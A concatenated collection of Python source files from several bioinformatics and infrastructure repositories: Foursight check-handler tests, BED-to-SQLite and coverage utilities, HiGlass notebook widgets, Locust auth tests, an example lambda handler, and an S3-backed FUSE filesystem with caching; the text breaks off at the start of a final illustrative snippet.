self.check_handler.validate_check_setup(bad_setup)
assert ('must have a list value' in str(exc.value))
bad_setup = {'indexing_progress': {'title': '', 'group': '', 'schedule': {'fake_sched': {'all': {'dependencies': ['not_a_real_check']}}}}}
with pytest.raises(exceptions.BadCheckSetup) as exc:
self.check_handler.validate_check_setup(bad_setup)
assert ('is not a valid check name that shares the same schedule' in str(exc.value))
# this one will work -- display provided
okay_setup = {'indexing_progress': {'title': '', 'group': '', 'schedule': {}, 'display': ['data']}}
okay_validated = self.check_handler.validate_check_setup(okay_setup)
assert (okay_validated['indexing_progress'].get('module') == 'system_checks')
# this one adds kwargs and id to setup
okay_setup = {'indexing_progress': {'title': '', 'group': '', 'schedule': {'fake_sched': {'all': {}}}}}
okay_validated = self.check_handler.validate_check_setup(okay_setup)
assert ({'kwargs', 'dependencies'} <= set(okay_validated['indexing_progress']['schedule']['fake_sched']['all'].keys()))
def test_get_action_strings(self):
all_action_strings = self.check_handler.get_action_strings()
for act_str in all_action_strings:
assert (len(act_str.split('/')) == 2)
# test a specific action
one_act_str = self.check_handler.get_action_strings('patch_file_size')
assert (one_act_str == 'wrangler_checks/patch_file_size')
assert (one_act_str in all_action_strings)
# test an action that doesn't exist
bad_act_str = self.check_handler.get_check_strings('not_a_real_action')
assert (bad_act_str is None)
def test_get_schedule_names(self):
schedules = self.check_handler.get_schedule_names()
assert (isinstance(schedules, list))
assert (len(schedules) > 0)
def test_get_check_title_from_setup(self):
title = self.check_handler.get_check_title_from_setup('indexing_progress')
assert (title == self.check_handler.CHECK_SETUP['indexing_progress']['title'])
def test_get_check_schedule(self):
schedule = self.check_handler.get_check_schedule('morning_checks_1')
assert (len(schedule) > 0)
for env in schedule:
assert (isinstance(schedule[env], list))
for check_info in schedule[env]:
assert len(check_info) == 3
# test with conditions
schedule_cond1 = self.check_handler.get_check_schedule('hourly_checks_1', conditions=['put_env'])
assert (0 < len(schedule_cond1) < len(schedule))
# test with conditions that don't exist (ALL must match)
schedule_cond2 = self.check_handler.get_check_schedule('hourly_checks_1',
conditions=['put_env', 'fake_condition'])
assert (len(schedule_cond2) == 0)
def test_get_checks_within_schedule(self):
checks_in_sched = self.check_handler.get_checks_within_schedule('morning_checks_1')
assert (len(checks_in_sched) > 0)
checks_in_sched = self.check_handler.get_checks_within_schedule('not_a_real_schedule')
assert (len(checks_in_sched) == 0)
@pytest.mark.parametrize('use_es', [True, False])
def test_get_check_results(self, use_es):
# dict to compare uuids
uuid_compares = {}
# will get primary results by default
if not use_es:
self.connection.connections['es'] = None
all_res_primary = self.check_handler.get_check_results(self.connection)
for check_res in all_res_primary:
assert (isinstance(check_res, dict))
assert ('name' in check_res)
assert ('status' in check_res)
assert ('uuid' in check_res)
if check_res.get('summary') == 'Check has not yet run': # ignore placeholders
continue
uuid_compares[check_res['name']] = check_res['uuid']
# compare to latest results (which should be the same or newer)
all_res_latest = self.check_handler.get_check_results(self.connection, use_latest=True)
for check_res in all_res_latest:
assert (isinstance(check_res, dict))
assert ('name' in check_res)
assert ('status' in check_res)
assert ('uuid' in check_res)
if check_res['name'] in uuid_compares:
assert (check_res['uuid'] >= uuid_compares[check_res['name']])
# get a specific check
one_res = self.check_handler.get_check_results(self.connection, checks=['indexing_progress'])
assert (len(one_res) == 1)
assert (one_res[0]['name'] == 'indexing_progress')
# bad check name, will now return a placeholder so len should be 1
test_res = self.check_handler.get_check_results(self.connection, checks=['not_a_real_check'])
assert (len(test_res) == 1)
assert test_res[0]['summary'] == 'Check has not yet run'
def test_get_grouped_check_results(self):
grouped_results = self.check_handler.get_grouped_check_results(self.connection)
for group in grouped_results:
assert ('_name' in group)
assert (isinstance(group['_statuses'], dict))
assert (len(group.keys()) > 2)
@pytest.mark.flaky
def test_run_check_or_action(self):
test_uuid = datetime.datetime.utcnow().isoformat()
check = run_result.CheckResult(self.connection, 'test_random_nums')
# with a check (primary is True)
test_info = ['test_checks/test_random_nums', {'primary': True, 'uuid': test_uuid}, [], 'xxx']
check_res = self.check_handler.run_check_or_action(self.connection, test_info[0], test_info[1])
assert (isinstance(check_res, dict))
assert ('name' in check_res)
assert ('status' in check_res)
# make sure runtime is in kwargs and pop it
assert ('runtime_seconds' in check_res.get('kwargs'))
check_res.get('kwargs').pop('runtime_seconds')
assert (check_res.get('kwargs') == {'primary': True, 'uuid': test_uuid, 'queue_action': 'Not queued'})
primary_uuid = check_res.get('uuid')
time.sleep(5)
primary_res = check.get_primary_result()
assert (primary_res.get('uuid') == primary_uuid)
latest_res = check.get_latest_result()
assert (latest_res.get('uuid') == primary_uuid)
# with a check and no primary=True flag
check_res = self.check_handler.run_check_or_action(self.connection, test_info[0], {})
latest_uuid = check_res.get('uuid')
assert ('runtime_seconds' in check_res.get('kwargs'))
check_res.get('kwargs').pop('runtime_seconds')
assert (check_res.get('kwargs') == {'primary': False, 'uuid': latest_uuid, 'queue_action': 'Not queued'})
# latest res will be more recent than primary res now
latest_res = check.get_latest_result()
assert (latest_res.get('uuid') == latest_uuid)
primary_res = check.get_primary_result()
assert (primary_uuid < latest_uuid)
# with an action
action = run_result.ActionResult(self.connection, 'add_random_test_nums')
act_kwargs = {'primary': True, 'uuid': test_uuid, 'check_name': 'test_random_nums',
'called_by': test_uuid}
        test_info_2 = ['test_checks/add_random_test_nums', act_kwargs, [], 'xxx']
action_res = self.check_handler.run_check_or_action(self.connection, test_info_2[0], test_info_2[1])
assert (isinstance(action_res, dict))
assert ('name' in action_res)
assert ('status' in action_res)
assert ('output' in action_res)
# pop runtime_seconds kwarg
assert ('runtime_seconds' in action_res['kwargs'])
action_res['kwargs'].pop('runtime_seconds')
assert (action_res.get('kwargs') == {'primary': True, 'offset': 0, 'uuid': test_uuid, 'check_name': 'test_random_nums', 'called_by': test_uuid})
act_uuid = action_res.get('uuid')
act_res = action.get_result_by_uuid(act_uuid)
assert (act_res['uuid'] == act_uuid)
latest_res = action.get_latest_result()
assert (latest_res['uuid'] == act_uuid)
# make sure the action can get its associated check result
assc_check = action.get_associated_check_result(act_kwargs)
assert (assc_check is not None)
assert (assc_check['name'] == act_kwargs['check_name'])
assert (assc_check['uuid'] == act_uuid)
def test_run_check_errors(self):
bad_check_group = [
['indexing_progress', {}, [], 'xx1'],
['wrangler_checks/item_counts_by_type', 'should_be_a_dict', [], 'xx1'],
['syscks/indexing_progress', {}, [], 'xx1'],
['wrangler_checks/iteasdts_by_type', {}, [], 'xx1'],
['test_checks/test_function_unused', {}, [], 'xx1']
]
for bad_check_info in bad_check_group:
check_res = self.check_handler.run_check_or_action(self.connection, bad_check_info[0], bad_check_info[1])
assert not (isinstance(check_res, dict))
assert ('ERROR' in check_res)
def test_run_check_exception(self):
check_res = self.check_handler.run_check_or_action(self.connection, 'test_checks/test_check_error', {})
assert (check_res['status'] == 'ERROR')
# this output is a list
assert ('by zero' in ''.join(check_res['full_output']))
assert (check_res['description'] == 'Check failed to run. See full output.')
def test_run_action_no_check_name_called_by(self):
action_res = self.check_handler.run_check_or_action(self.connection, 'test_checks/test_action_error', {})
assert (action_res['status'] == 'FAIL')
# this output is a list
assert ('Action requires check_name and called_by in its kwargs' in ''.join(action_res['output']))
assert (action_res['description'] == 'Action failed to run. See output.')
def test_run_action_exception(self):
action_res = self.check_handler.run_check_or_action(self.connection, 'test_checks/test_action_error', {'check_name': '', 'called_by': None})
assert (action_res['status'] == 'FAIL')
# this output is a list
assert ('by zero' in ''.join(action_res['output']))
assert (action_res['description'] == 'Action failed to run. See output.')
def test_create_placeholder_check(self):
""" Tests that placeholder checks are properly generated """
placeholder = check_schema.CheckSchema().create_placeholder_check('test_check')
assert placeholder['name'] == 'test_check'
assert placeholder['status'] == 'PASS'
assert placeholder['description'] == 'If queued, this check will run with default arguments'
```
#### File: foursight/tests/test_fs_connection.py
```python
from conftest import *
from botocore.exceptions import ClientError
class TestFSConnection():
environ_info = {
'fourfront': 'test1',
'es': 'test2',
'bucket': None,
'ff_env': 'test3'
}
connection = fs_connection.FSConnection('test', environ_info, test=True, host=HOST)
def test_connection_fields(self):
assert (self.connection.fs_env == 'test')
assert (self.connection.connections['s3'].status_code == 404)
assert (self.connection.ff_server == 'test1')
assert (self.connection.ff_es == 'test2')
assert (self.connection.ff_env == 'test3')
assert (self.connection.ff_s3 is None)
assert (self.connection.ff_keys is None)
def test_run_check_with_bad_connection(self):
check_handler = check_utils.CheckHandler(FOURSIGHT_PREFIX, 'chalicelib', os.path.dirname(chalicelib_path))
check_res = check_handler.run_check_or_action(self.connection, 'wrangler_checks/item_counts_by_type', {})
# run_check_or_action returns a dict with results
print("check_res=" + str(check_res))
assert (check_res.get('status') == 'ERROR')
assert (check_res.get('name') == 'item_counts_by_type')
def test_check_result_basics(self):
test_check = decorators.Decorators(FOURSIGHT_PREFIX).CheckResult(self.connection, 'test_check')
test_check.summary = 'Unittest check'
test_check.ff_link = 'not_a_real_http_link'
assert (test_check.connections['s3'].status_code == 404)
assert (test_check.get_latest_result() is None)
assert (test_check.get_primary_result() is None)
with pytest.raises(Exception) as exec_info:
test_check.get_closest_result(1)
assert ('Could not find any results' in str(exec_info.value))
formatted_res = test_check.format_result(datetime.datetime.utcnow())
assert (formatted_res.get('status') == 'IGNORE')
assert (formatted_res.get('summary') == 'Unittest check')
assert (formatted_res.get('description') == 'Unittest check')
assert (formatted_res.get('type') == 'check')
# set a bad status on purpose
test_check.status = "BAD_STATUS"
check_res = test_check.store_result()
assert (check_res.get('name') == formatted_res.get('name'))
assert (check_res.get('description') == "Malformed status; look at Foursight check definition.")
assert (check_res.get('brief_output') == formatted_res.get('brief_output') == None)
assert (check_res.get('ff_link') == 'not_a_real_http_link')
def test_bad_ff_connection_in_fs_connection(self):
try:
# Note we do not set test=True. This should raise a ClientError because it's not a real FF env.
fs_connection.FSConnection('nosuchenv', self.environ_info, host=HOST)
except ClientError as e:
# This is what we expect to happen.
assert e.response['Error']['Code'] == 404
except Exception as e:
# Should never get here.
            raise AssertionError(f"Got unexpected error ({type(e)}): {e}")
else:
# Should never get here either.
raise AssertionError(f"Got no error where a ClientError was expected.")
``` |
{
"source": "4dn-dcic/higlass-multicontact",
"score": 3
} |
#### File: higlass-multicontact/hgmc/bed.py
```python
import gzip
import math
import numpy as np
import os
import sqlite3
import time
# bed_filepath needs to be sorted!
def bed_to_sql(bed_filepath, chrom_sizes_filepath, feature_name: str = None):
base, ext = os.path.splitext(bed_filepath)
open_bed = lambda f: open(f, 'r')
if ext == '.gz' or ext == '.gzip':
open_bed = lambda f: gzip.open(f, 'rt')
base, ext = os.path.splitext(base)
sqlite_filepath = base + ".sqlite"
with open_bed(bed_filepath) as f:
num_columns = len(f.readline().split('\t'))
if num_columns < 4 and feature_name is None:
raise ValueError(
'Either provide a BED4 file or provide `feature_name`'
)
# Reset cursor
f.seek(0)
conn = sqlite3.connect(sqlite_filepath)
conn.execute("DROP TABLE IF EXISTS intervals")
conn.execute(
"""
CREATE TABLE intervals
(
id INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL,
chrom TEXT,
start INT,
end INT,
name TEXT
)
"""
)
conn.execute("DROP TABLE IF EXISTS features")
conn.execute("CREATE TABLE features (name TEXT PRIMARY KEY NOT NULL)")
cur = conn.cursor()
def split_line_bed3(line):
return (*line.split('\t'), feature_name)
def split_line_bed4(line):
            # strip the trailing newline so the 4th column (name) is stored cleanly
            return line.rstrip('\n').split('\t')[:4]
split_line = split_line_bed4 if num_columns >= 4 else split_line_bed3
unique_features = set()
for line in f:
chrom, start, end, name = split_line(line)
unique_features.add(name)
cur.execute(
"INSERT INTO intervals (chrom, start, end, name) "
"VALUES (?, ?, ?, ?)",
(chrom, int(start), int(end), name),
)
conn.execute("CREATE INDEX interval_bounds ON intervals (start, end)")
for name in unique_features:
cur.execute("INSERT INTO features (name) VALUES (?)", (name,),)
if chrom_sizes_filepath:
conn.execute("DROP TABLE IF EXISTS chrom_sizes")
conn.execute(
"""
CREATE TABLE chrom_sizes
(
chrom TEXT PRIMARY KEY,
size INT
)
"""
)
cur = conn.cursor()
with open(chrom_sizes_filepath, 'r') as f:
for line in f:
chrom, size = line.split('\t')
cur.execute(
"INSERT INTO chrom_sizes (chrom, size) "
"VALUES (?, ?)",
(chrom, int(size)),
)
conn.commit()
conn.close()
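# Illustrative usage (hypothetical file names): converting a sorted, gzipped BED4 file
# writes an sqlite file next to it, e.g.
#   bed_to_sql('annotations.bed.gz', 'hg38.chrom.sizes')  # -> creates annotations.sqlite
# For a BED3 file, pass feature_name to label every interval.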
def sql_features(sqlite_filepath):
conn = sqlite3.connect(sqlite_filepath)
cur = conn.cursor()
return [x[0] for x in cur.execute("SELECT name FROM features").fetchall()]
def sql_coverage(
sqlite_filepath,
chrom: str,
bin_size: int,
features: list = None,
# Number of bp of the feature that needs to be in the bin for the feature
# to count
count_at_feat_cov: int = None,
# If true, `count_at_feat_cov` represents the percentage of the feature size
# that needs to be in the bin for the feature to count
rel_count_at_feat_cov: bool = False,
# Number of bp that need to be cover by the feature for the feature
# to count
count_at_bin_cov: int = None,
# If true, `count_at_bin_cov` represents the percentage of the bin size
# that needs to be cover by the feature for the feature to count
rel_count_at_bin_cov: bool = False,
# By default, if `count_at_feat_cov` and `count_at_bin_cov` are specified
# both conditions need to be fulfilled. If `feat_or_bin_cov` is true it's
# enough that one is fulfilled
feat_or_bin_cov: bool = False,
timeit: bool = False,
verbose: bool = False
):
t0 = time.time()
conn = sqlite3.connect(sqlite_filepath)
cur = conn.cursor()
res = cur.execute(
"SELECT * FROM chrom_sizes WHERE chrom = ?", (chrom,),
).fetchone()
if res is None:
return None
_, chrom_size = res
res = cur.execute(
"SELECT MIN(id), MAX(id) FROM intervals WHERE chrom = ?", (chrom,),
).fetchone()
if res is None:
return None
min_id, max_id = res
num_bins = math.ceil(chrom_size / bin_size)
chrom_padded_size = bin_size * num_bins
coverage = np.zeros(num_bins).astype(int)
constraint_id = f'id >= {min_id} AND id <= {max_id} '
constraint_feature = ''
if features is not None:
if isinstance(features, list):
c = ' OR '.join([f'name = "{f}"' for f in features])
constraint_feature = f'AND ({c}) '
else:
constraint_feature = f'AND name = "{features}" '
i = 0
if count_at_feat_cov is None and count_at_bin_cov is None:
for bin_start in np.arange(0, chrom_padded_size, bin_size):
bin_end = bin_start + bin_size
count = cur.execute(
f"""
SELECT
COUNT(*)
FROM
intervals
WHERE
{constraint_id}
{constraint_feature}
AND start < ?
AND end >= ?
""",
(int(bin_end), int(bin_start),),
).fetchone()[0]
coverage[i] = count
if verbose:
                print(f'In [{bin_start},{bin_end}) found {count} annotations')
i += 1
else:
for bin_start in np.arange(0, chrom_padded_size, bin_size):
bin_end = bin_start + bin_size
results = cur.execute(
f"""
SELECT
start, end, end-start
FROM
intervals
WHERE
{constraint_id}
{constraint_feature}
AND start < ?
AND end >= ?
""",
(int(bin_end), int(bin_start),),
).fetchall()
if results is not None:
count = 0
for result in results:
feat_start, feat_end, feat_size = result
feat_coverage = min(feat_end, bin_end) - max(feat_start, bin_start)
should_count = True
if count_at_feat_cov:
threshold = rel_count_at_feat_cov * count_at_feat_cov * feat_size or count_at_feat_cov
should_count = feat_coverage >= threshold
if feat_or_bin_cov:
if should_count:
count += 1
continue
else:
should_count = True
if should_count and count_at_bin_cov:
threshold = rel_count_at_bin_cov * count_at_bin_cov * bin_size or count_at_bin_cov
should_count = feat_coverage >= threshold
if should_count:
count += 1
coverage[i] = count
if verbose:
                    print(f'In [{bin_start},{bin_end}) found {count} annotations')
i += 1
if timeit:
print(f'Took {(time.time() - t0):.3f} sec')
return coverage
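    # Illustrative usage (hypothetical values): count intervals named 'enhancer' per 10 kb
    # bin on chr1, requiring at least half of each bin to be covered:
    #   cov = sql_coverage('annotations.sqlite', 'chr1', 10000, features='enhancer',
    #                      count_at_bin_cov=0.5, rel_count_at_bin_cov=True)
    # The result is a numpy array with ceil(chrom_size / bin_size) entries, or None if the
    # chromosome is missing from the sqlite file.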
```
#### File: higlass-multicontact/hgmc/widgets.py
```python
import higlass as hg
from IPython.display import display
from matplotlib.cm import get_cmap
from .tilesets import Hgmc1dData
from .utils import get_selection_widgets, link_selection_widgets, get_anchor
cmap = get_cmap("cool")
BAR_TRACK_CONFIG = {
"uid": "bars",
"track_type": "horizontal-bar",
"position": "top",
"height": 128,
"options": {
"colorRange": ["#ffffe0", "#0000bf"],
"labelColor": "black",
"backgroundColor": "white",
},
}
ANCHORS_OPTIONS = {
"fillColor": "orange",
"fillOpacity": 1,
"outline": "white",
"outlineWidth": 1,
"outlinePos": ["left", "right"],
}
NEW_ANCHORS_OPTIONS = {
"fillOpacity": 0,
"stroke": "orange",
"strokeWidth": 2,
"strokePos": ["top", "left", "right"],
"outline": "white",
"outlineWidth": 1,
"outlinePos": ["left", "right"],
}
def get_higlass_widget(mc_level):
higlass, _, _ = hg.display(mc_level.higlass_views, no_fuse=True)
link_selection_widgets(
higlass, mc_level.select_mode, mc_level.x_from, mc_level.x_to
)
return higlass
class McLevel:
def __init__(self, tileset, higlass_views, x_from, x_to, select_mode, anchor=None):
self.tileset = tileset
self.anchor = anchor
self.higlass_views = higlass_views
self.x_from = x_from
self.x_to = x_to
self.select_mode = select_mode
@property
def root(self):
return self.anchor is None
class Hgmc1d:
def __init__(self, filepath, name: str, ignored_anchor_padding: int = 10):
self.filepath = filepath
self.name = name
self.ignored_anchor_padding = ignored_anchor_padding
self.data = Hgmc1dData(
filepath, name=self.name, ignored_anchor_padding=self.ignored_anchor_padding
)
self.base_tileset = self.data.tileset()
self.axis = hg.Track("top-axis", uid="axis")
self.levels = []
higlass_views = [
hg.View(
[self.axis, hg.Track(tileset=self.base_tileset, **BAR_TRACK_CONFIG)]
)
]
select_mode, x_from, x_to = get_selection_widgets()
self.levels.append(
McLevel(
tileset=self.base_tileset,
higlass_views=higlass_views,
select_mode=select_mode,
x_from=x_from,
x_to=x_to,
)
)
@property
def level(self):
return len(self.levels) - 1
@property
def anchors(self):
anchors = []
for level in self.levels:
if level.anchor is not None:
anchors.append(level.anchor)
return anchors
def get_anchor_regions(self, additional_anchors=[]):
anchors = self.anchors + additional_anchors
anchor_regions = []
for anchor in anchors:
if anchor is not None:
anchor_regions.append(
[
anchor - self.ignored_anchor_padding,
anchor + self.ignored_anchor_padding + 1,
]
)
return anchor_regions
def show_all_levels(self, track_height: int = 36):
tracks = [self.axis]
overlays = []
curr_anchors = []
for index, level in enumerate(self.levels):
uid = "bars-{}".format(index)
tracks.append(
hg.Track(
tileset=level.tileset,
**{**BAR_TRACK_CONFIG, **{"uid": uid, "height": track_height}}
)
)
if level.anchor is not None:
new_anchor = [
level.anchor - self.ignored_anchor_padding,
level.anchor + self.ignored_anchor_padding + 1,
]
overlays.append(
{
"uid": "overlays-{}-new".format(index),
"includes": ["bars-{}".format(index - 1)],
"options": {**{"extent": [new_anchor]}, **NEW_ANCHORS_OPTIONS},
}
)
curr_anchors.append(new_anchor)
if len(curr_anchors):
overlays.append(
{
"uid": "overlays-{}-prev".format(index),
"includes": [uid],
"options": {
**{"extent": curr_anchors.copy()},
**ANCHORS_OPTIONS,
},
}
)
else:
overlays.append(
{
"uid": "overlays-{}".format(index),
"includes": ["axis"],
"options": {
**{
"extent": self.get_anchor_regions([level.anchor]),
"minWidth": 4,
},
**ANCHORS_OPTIONS,
},
}
)
higlass, _, _ = hg.display([hg.View(tracks, overlays=overlays)], no_fuse=True)
display(higlass)
def show_current_level(self):
level = self.level
mc_level = self.levels[level]
higlass = get_higlass_widget(mc_level)
display(mc_level.select_mode, higlass, mc_level.x_from, mc_level.x_to)
def show(self, level: int = None, all: bool = False):
if all:
self.show_all_levels()
return
if level is None:
self.show_current_level()
return
level = max(0, min(self.level + 1, level))
if level > self.level:
self.show_next_level()
mc_level = self.levels[level]
higlass = get_higlass_widget(mc_level)
display(mc_level.select_mode, higlass, mc_level.x_from, mc_level.x_to)
def show_next_level(self):
self.next_level()
self.show_current_level()
def next_level(self):
current_mc_level = self.levels[self.level]
anchor = get_anchor(current_mc_level.x_from, current_mc_level.x_to)
# start, end = anchor
# if start is None or end is None:
# return current_mc_level
self.data.add_anchors(anchor)
tileset = self.data.tileset()
overlays = self.get_anchor_regions([anchor])
overlays = [
{
"includes": ["axis", "bars"],
"options": {**{"extent": overlays, "minWidth": 4}, **ANCHORS_OPTIONS},
}
]
higlass_views = [
hg.View(
[self.axis, hg.Track(tileset=tileset, **BAR_TRACK_CONFIG)],
overlays=overlays,
)
]
select_mode, x_from, x_to = get_selection_widgets()
next_mc_level = McLevel(
anchor=anchor,
tileset=tileset,
higlass_views=higlass_views,
select_mode=select_mode,
x_from=x_from,
x_to=x_to,
)
self.levels.append(next_mc_level)
return next_mc_level
def reset(self):
while len(self.levels) > 1:
self.levels.pop()
self.data.remove_anchors()
``` |
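A minimal usage sketch for the `Hgmc1d` widget defined above, assuming a notebook environment with the `hgmc` package installed; the file path and dataset name are placeholders, and `show`/`next_level`/`reset` are the methods defined in the class.
```python
# Hypothetical notebook usage of Hgmc1d; "clusters.bed" and "example-dataset" are placeholders.
from hgmc.widgets import Hgmc1d

mc = Hgmc1d("clusters.bed", name="example-dataset")

# Display the root level together with its selection widgets.
mc.show()

# After selecting a region in the HiGlass view, fix it as an anchor
# and move on to the next multi-contact level.
mc.next_level()

# Overview of every level created so far, with anchor overlays.
mc.show(all=True)

# Drop all anchors and return to the root level.
mc.reset()
```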
{
"source": "4dn-dcic/post-deploy-perf-tests",
"score": 3
} |
#### File: lib/test/test_locust_api.py
```python
import unittest
from unittest import mock
from ..locust_api import LocustAuthHandler
class TestLocustAPI(unittest.TestCase):
def test_load_auth_from_config(self):
with mock.patch('json.load', return_value={
'username': 'blah',
'password': '<PASSWORD>'
}):
api = LocustAuthHandler(auth=__file__, use_env=False) # this is ok since we patched json.load
self.assertEqual(api.username, 'blah')
self.assertEqual(api.password, '<PASSWORD>')
@mock.patch.dict('os.environ', {
LocustAuthHandler.LOCUST_USER_FF: 'blah',
LocustAuthHandler.LOCUST_PASS_FF: '<PASSWORD>'
})
def test_load_auth_from_ff_env(self):
api = LocustAuthHandler(use_env=True)
self.assertEqual(api.username, 'blah')
self.assertEqual(api.password, '<PASSWORD>')
@mock.patch.dict('os.environ', {
LocustAuthHandler.LOCUST_USER_CGAP: 'blah',
LocustAuthHandler.LOCUST_PASS_CGAP: '<PASSWORD>'
})
def test_load_auth_from_cgap_env(self):
api = LocustAuthHandler(use_env=True, is_ff=False) # do CGAP
self.assertEqual(api.username, 'blah')
self.assertEqual(api.password, '<PASSWORD>')
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "4dn-dcic/python-lambda",
"score": 2
} |
#### File: tests/test_lambdas/example_function_update.py
```python
config = {
'function_name': 'my_test_function',
'function_module': 'service',
'function_handler': 'handler',
'handler': 'service.handler',
'region': 'us-east-1',
'runtime': 'python3.6',
'role': 'helloworld',
'description': 'Test lambda'
}
def handler(event, context):
return 'Hello! I have been updated! My input event is %s' % event
``` |
{
"source": "4dn-dcic/simple-s3fs",
"score": 2
} |
#### File: simple-s3fs/simple_s3fs/httpfs.py
```python
import collections
import logging
import numpy as np
import os
import os.path as op
import requests
import sys
import traceback
import re
from errno import EIO, ENOENT
from stat import S_IFDIR, S_IFREG
from threading import Timer
from time import time
import boto3
from fuse import FUSE, FuseOSError, Operations, LoggingMixIn
import diskcache as dc
import slugid
from ftplib import FTP
from urllib.parse import urlparse
CLEANUP_INTERVAL = 60
CLEANUP_EXPIRED = 60
REPORT_INTERVAL = 60
DISK_CACHE_SIZE_ENV = "HTTPFS_DISK_CACHE_SIZE"
DISK_CACHE_DIR_ENV = "HTTPFS_DISK_CACHE_DIR"
FALSY = {0, "0", False, "false", "False", "FALSE", "off", "OFF"}
class LRUCache:
def __init__(self, capacity):
self.capacity = capacity
self.cache = collections.OrderedDict()
def __getitem__(self, key):
value = self.cache.pop(key)
self.cache[key] = value
return value
def __setitem__(self, key, value):
try:
self.cache.pop(key)
except KeyError:
if len(self.cache) >= self.capacity:
self.cache.popitem(last=False)
self.cache[key] = value
def __contains__(self, key):
return key in self.cache
def __len__(self):
return len(self.cache)
class S3Fetcher:
SSL_VERIFY = os.environ.get("SSL_VERIFY", True) not in FALSY
def __init__(self, aws_profile, bucket, logger):
self.logger = logger
self.logger.info("Creating S3Fetcher with aws_profile=%s", aws_profile)
self.session = boto3.Session(profile_name=aws_profile)
self.client = self.session.client('s3')
self.bucket = bucket
pass
def parse_key(self, url):
url_parts = urlparse(url, allow_fragments=False)
key = url_parts.path.strip('/')
return key
def get_size(self, url):
key = self.parse_key(url)
response = self.client.head_object(Bucket=self.bucket, Key=key)
size = response['ContentLength']
return size
def get_data(self, url, start, end):
key = self.parse_key(url)
obj = boto3.resource('s3').Object(self.bucket, key)
stream = self.client.get_object(Bucket=self.bucket, Key=key, Range="bytes={}-{}".format(start, end))['Body']
contents = stream.read()
block_data = np.frombuffer(contents, dtype=np.uint8)
return block_data
class HttpFs(LoggingMixIn, Operations):
"""
A read-only FUSE filesystem; originally http/https/ftp-backed, here served from S3 via S3Fetcher.
"""
def __init__(
self,
bucket,
disk_cache_size=2 ** 30,
disk_cache_dir="/tmp/xx",
lru_capacity=400,
block_size=2 ** 20,
aws_profile=None,
logger=None,
):
self.lru_cache = LRUCache(capacity=lru_capacity)
self.lru_attrs = LRUCache(capacity=lru_capacity)
self.logger = logger
self.last_report_time = 0
self.total_requests = 0
if not self.logger:
self.logger = logging.getLogger(__name__)
self.fetcher = S3Fetcher(aws_profile, bucket, self.logger)
self.disk_cache = dc.Cache(disk_cache_dir, disk_cache_size)
self.total_blocks = 0
self.lru_hits = 0
self.lru_misses = 0
self.lru_capacity = lru_capacity
self.disk_hits = 0
self.disk_misses = 0
self.block_size = block_size
self.bucket = bucket
def getSize(self, url):
try:
return self.fetcher.get_size(url)
except Exception as ex:
self.logger.exception(ex)
raise
def getattr(self, path, fh=None):
# print("getattr path {}".format(path))
try:
if path in self.lru_attrs:
return self.lru_attrs[path]
if path == "/" or path.endswith('.localized') or path.endswith('.hidden') or path.endswith('.DS_Store'):
self.lru_attrs[path] = dict(st_mode=(S_IFDIR | 0o555), st_nlink=2)
return self.lru_attrs[path]
# We assume that files have a '.' somewhere and folder names do not contain dots.
last_segment = path.split('/')[-1]
if not "." in last_segment and not path.endswith('-journal') and not path.endswith('-wal'):
return dict(st_mode=(S_IFDIR | 0o555), st_nlink=2)
url = "https://{}.s3.amazonaws.com/{}".format(self.bucket, path)
# there's an exception for the -journal files created by SQLite
if not path.endswith('-journal') and not path.endswith('-wal'):
size = self.getSize(url)
else:
size = 0
# logging.info("head: {}".format(head.headers))
# logging.info("status_code: {}".format(head.status_code))
# print("url:", url, "head.url", head.url)
if size is not None:
self.lru_attrs[path] = dict(
st_mode=(S_IFREG | 0o644),
st_nlink=1,
st_size=size,
st_ctime=time(),
st_mtime=time(),
st_atime=time(),
)
else:
self.lru_attrs[path] = dict(st_mode=(S_IFDIR | 0o555), st_nlink=2)
return self.lru_attrs[path]
except Exception as ex:
self.logger.exception(ex)
raise
def unlink(self, path):
return 0
def create(self, path, mode, fi=None):
return 0
def write(self, path, buf, size, offset, fip):
return 0
def read(self, path, size, offset, fh):
# print("Read path {}".format(path))
t1 = time()
if t1 - self.last_report_time > REPORT_INTERVAL:
self.logger.info(
"num lru_attrs: {}/{} lru hits: {} lru misses: {} disk hits: {} total_requests: {}".format(
len(self.lru_attrs), self.lru_capacity, self.lru_hits, self.lru_misses, self.disk_hits, self.disk_misses, self.total_requests
)
)
self.last_report_time = t1
try:
self.total_requests += 1
if path in self.lru_attrs:
url = "https://{}.s3.amazonaws.com/{}".format(self.bucket, path)
self.logger.debug("read url: {}".format(url))
self.logger.debug(
"offset: {} - {} request_size (KB): {:.2f} block: {}".format(
offset, offset + size - 1, size / 2 ** 10, offset // self.block_size
)
)
output = np.zeros((size,), np.uint8)
t1 = time()
# nothing fetched yet
last_fetched = -1
curr_start = offset
while last_fetched < offset + size:
block_num = curr_start // self.block_size
block_start = self.block_size * (curr_start // self.block_size)
block_data = self.get_block(url, block_num)
data_start = (
curr_start - (curr_start // self.block_size) * self.block_size
)
data_end = min(self.block_size, offset + size - block_start)
data = block_data[data_start:data_end]
d_start = curr_start - offset
output[d_start : d_start + len(data)] = data
last_fetched = curr_start + (data_end - data_start)
curr_start += data_end - data_start
bts = bytes(output)
return bts
else:
logging.info("file not found: {}".format(path))
raise FuseOSError(EIO)
except Exception as ex:
self.logger.exception(ex)
raise
def destroy(self, path):
self.disk_cache.close()
def get_block(self, url, block_num):
"""
Get a data block from a URL. Blocks are `self.block_size` bytes (1 MiB by default)
Parameters:
-----------
url: string
The url of the file we want to retrieve a block from
block_num: int
The index of the block (of size `self.block_size`) within this file
"""
cache_key = "{}.{}.{}".format(url, self.block_size, block_num)
cache = self.disk_cache
self.total_blocks += 1
if cache_key in self.lru_cache:
self.lru_hits += 1
hit = self.lru_cache[cache_key]
return hit
else:
self.lru_misses += 1
if cache_key in self.disk_cache:
try:
block_data = self.disk_cache[cache_key]
self.disk_hits += 1
self.lru_cache[cache_key] = block_data
return block_data
except KeyError:
pass
self.disk_misses += 1
block_start = block_num * self.block_size
block_data = self.fetcher.get_data(
url, block_start, block_start + self.block_size - 1
)
self.lru_cache[cache_key] = block_data
self.disk_cache[cache_key] = block_data
return block_data
```
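The `read`/`get_block` pair above serves arbitrary byte ranges by stitching together fixed-size blocks cached in the LRU and on disk. The following standalone sketch (not part of the original module) reproduces just the block arithmetic to make the slicing easier to follow:
```python
# Standalone illustration of the block-aligned slicing used by HttpFs.read().
# BLOCK_SIZE mirrors the class default of 2**20 bytes; the offsets are arbitrary examples.
BLOCK_SIZE = 2 ** 20

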